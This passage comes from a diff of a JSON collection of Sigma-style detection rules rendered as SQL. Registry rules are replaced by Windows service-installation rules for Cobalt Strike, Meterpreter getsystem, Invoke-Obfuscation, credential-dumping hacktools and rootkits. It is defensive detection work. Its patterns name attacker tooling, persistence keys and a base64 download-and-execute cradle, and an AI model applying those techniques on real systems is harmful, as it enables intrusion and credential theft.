of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects 
a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + 
"attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND 
ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": 
"win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + 
"attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": 
"registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ 
"attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File 
Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE 
'\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath 
LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": 
